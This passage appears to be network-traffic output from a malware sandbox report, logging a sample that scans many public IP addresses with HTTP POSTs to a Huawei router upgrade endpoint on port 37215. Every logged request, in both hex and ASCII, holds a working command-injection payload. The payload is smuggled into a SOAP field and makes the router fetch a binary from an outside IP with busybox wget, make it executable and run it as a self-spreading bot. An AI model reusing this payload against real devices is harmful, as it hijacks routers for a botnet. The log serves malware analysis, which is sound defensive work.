69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  40192.168.2.134024641.190.231.8937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.059554100 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  41192.168.2.1333380143.243.32.25037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.059554100 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  42192.168.2.1336252197.171.38.1237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.059597969 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  43192.168.2.1348292197.102.83.1037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.059602976 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  44192.168.2.1359962171.254.229.14637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.059655905 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  45192.168.2.135435684.20.71.12137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.059655905 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  46192.168.2.135045041.1.40.17337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.059655905 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  47192.168.2.1345416157.156.182.9537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.059761047 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  48192.168.2.1343194157.184.5.5337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.059762001 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  49192.168.2.1340804157.137.49.1237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.059806108 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  50192.168.2.135386241.45.75.13537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.060694933 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
